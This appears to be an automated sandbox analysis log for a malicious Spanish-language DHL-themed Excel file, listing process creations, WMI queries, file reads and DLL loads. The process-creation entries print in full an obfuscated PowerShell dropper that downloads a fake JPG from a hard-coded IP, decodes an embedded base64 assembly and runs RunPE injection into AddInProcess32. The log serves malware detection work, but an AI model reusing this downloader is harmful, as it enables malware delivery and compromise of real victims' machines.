                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........X.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................'.=.'...(.P.....................L........Y.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........Y.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.1.2.7.../Y.........................s....................&.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......;Y.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......MY.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......YY.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......kY.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......wY.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........Y.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........Y.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.d.i.n.g.E.x.c.e.p.t.i.o.n........Y.........................s....................".......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........Y.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........Y.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........Y.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . ...C.o.m.m.a.n.d.s...S.e.t.V.a.r.i.a.b.l.e.C.o.m.m.a.n.d......s....................>.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........Y.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................L........Z.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........Z.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................~d.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................d.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................'.=.'...(.P..............................d.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................d.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.3.1.9.8....d.........................s....................&.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................d.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................d.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................d.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................d.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................e.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................e.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................#e.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.d.i.n.g.E.x.c.e.p.t.i.o.n.......8e.........................s....................".......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................De.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................We.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................ce.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . ...C.o.m.m.a.n.d.s...S.e.t.V.a.r.i.a.b.l.e.C.o.m.m.a.n.d......s....................>.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................e.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................e.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................e.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......mq.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......yq.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................'.=.'...(.P..............................q.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........q.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.2.7.9....q.........................s....................&.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........q.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........q.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........q.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........q.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........q.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........r.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........r.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.d.i.n.g.E.x.c.e.p.t.i.o.n.......#r.........................s....................".......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L......./r.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......Ar.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......Mr.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . ...C.o.m.m.a.n.d.s...S.e.t.V.a.r.i.a.b.l.e.C.o.m.m.a.n.d......s....................>.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......kr.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................L.......~r.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........r.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................z..........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................'.=.'...(.P........................................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3.5.0..............................s....................&.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................l..................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................l..................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................l..................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................l..................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................l..................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................l..................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................l..................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.d.i.n.g.E.x.c.e.p.t.i.o.n.......0..........................s....................".......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................l.......<..........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................O..........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................[..........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................y..........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P........................................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: DHL ESTADO DE CUENTA - 7664557687757.xlam.xlsxReversingLabs: Detection: 68%
                  Source: DHL ESTADO DE CUENTA - 7664557687757.xlam.xlsxVirustotal: Detection: 52%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\controlfiredatinloverforxlammfile.vbs"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "INVOkE-EXpRessIon ( ('oiL'+'li'+'n'+'k = Olshttp'+'://91.92.254.194/imge/new-image'+'_v.jpgOls; oiLwebClient = New-Object'+' System.Net.WebClient; try { oiLdownloadedData = oi'+'LwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oiLnull) { oiLimageText = [Sy'+'stem.T'+'ex'+'t.Encoding]::UTF8.GetString'+'(oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIn'+'dex -gt oiLstartIndex) { oiLstartInd'+'ex += oiLstartFlag.Length; oiLbase64Length = oiLendIn'+'dex - oiLstartInd'+'ex; oiLbase64Command = oiLimageText.Substri'+'ng(oiLstartIndex, oiLbase64Lengt'+'h); oiLcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiL'+'loadedAssembly = [System.Reflection.Assembly]::Load(oiLcomm'+'andBytes); oiLtype = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull,'+' [object[]] (Olstxt.4446sabbbbbbbewmadam/441.871.64.8'+'91//:ptthOls , Olsdesativad'+'oOls , OlsdesativadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scriptblock oiLlink = Olshttp://91.92.254.194/imge/new-image_v.jpgOls; oiLwebClient ='+' New-Object System.Net.WebClient; try { oi'+'LdownloadedData = oiLwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To down'+'load data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oi'+'Lnull) { oiLimageText = [System.T'+'ext.Encoding]::UTF8.GetString('+'oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLen'+'dIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendInde'+'x -gt oiLstartIndex) { oiLstartIndex += '+'oiLstartFlag.Length; oiLbase64Length = oiLendIndex - oiLstartIndex; oiLbase64Command ='+' oiLimageText.Substring(oiLstartIndex'+', oiLbase64Length); oi'+'LcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiLloadedAssembly = [System.Reflection.'+'Assembly]::Load(oiLcommandBytes); oiLtype = '+'oiLloadedAssembly.GetType(Ols'+'RunPE.HomeOl'+'s); oiLmethod = oiLtype.GetMethod(Ols'+'VAIOl'+'s).Invoke(oiLnull, [object[]] (Olstxt.4'+'446sab'+'bbbbbbewmadam/441.871.64.891//:ptthOls , Olsdesativ'+'adoOls , OlsdesativadoOls , Olsdesati'+'vadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scr'+'iptblock oiLlink '+'= Olshttp://91.92.2'+'54.194/imge/new-image_v.jpgOls; oiLwebClient = New-'+'Object System.Net.WebClient; try { oiLdownloadedData '+'= oiLw'+'ebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data '+'from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData'+' -ne oiLnu'+'ll)
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\controlfiredatinloverforxlammfile.vbs" Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "INVOkE-EXpRessIon ( ('oiL'+'li'+'n'+'k = Olshttp'+'://91.92.254.194/imge/new-image'+'_v.jpgOls; oiLwebClient = New-Object'+' System.Net.WebClient; try { oiLdownloadedData = oi'+'LwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oiLnull) { oiLimageText = [Sy'+'stem.T'+'ex'+'t.Encoding]::UTF8.GetString'+'(oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIn'+'dex -gt oiLstartIndex) { oiLstartInd'+'ex += oiLstartFlag.Length; oiLbase64Length = oiLendIn'+'dex - oiLstartInd'+'ex; oiLbase64Command = oiLimageText.Substri'+'ng(oiLstartIndex, oiLbase64Lengt'+'h); oiLcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiL'+'loadedAssembly = [System.Reflection.Assembly]::Load(oiLcomm'+'andBytes); oiLtype = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull,'+' [object[]] (Olstxt.4446sabbbbbbbewmadam/441.871.64.8'+'91//:ptthOls , Olsdesativad'+'oOls , OlsdesativadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scriptblock oiLlink = Olshttp://91.92.254.194/imge/new-image_v.jpgOls; oiLwebClient ='+' New-Object System.Net.WebClient; try { oi'+'LdownloadedData = oiLwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To down'+'load data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oi'+'Lnull) { oiLimageText = [System.T'+'ext.Encoding]::UTF8.GetString('+'oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLen'+'dIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendInde'+'x -gt oiLstartIndex) { oiLstartIndex += '+'oiLstartFlag.Length; oiLbase64Length = oiLendIndex - oiLstartIndex; oiLbase64Command ='+' oiLimageText.Substring(oiLstartIndex'+', oiLbase64Length); oi'+'LcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiLloadedAssembly = [System.Reflection.'+'Assembly]::Load(oiLcommandBytes); oiLtype = '+'oiLloadedAssembly.GetType(Ols'+'RunPE.HomeOl'+'s); oiLmethod = oiLtype.GetMethod(Ols'+'VAIOl'+'s).Invoke(oiLnull, [object[]] (Olstxt.4'+'446sab'+'bbbbbbewmadam/441.871.64.891//:ptthOls , Olsdesativ'+'adoOls , OlsdesativadoOls , Olsdesati'+'vadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scr'+'iptblock oiLlink '+'= Olshttp://91.92.2'+'54.194/imge/new-image_v.jpgOls; oiLwebClient = New-'+'Object System.Net.WebClient; try { oiLdownloadedData '+'= oiLw'+'ebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data '+'from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData'+' -ne oiLnu'+'ll) Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
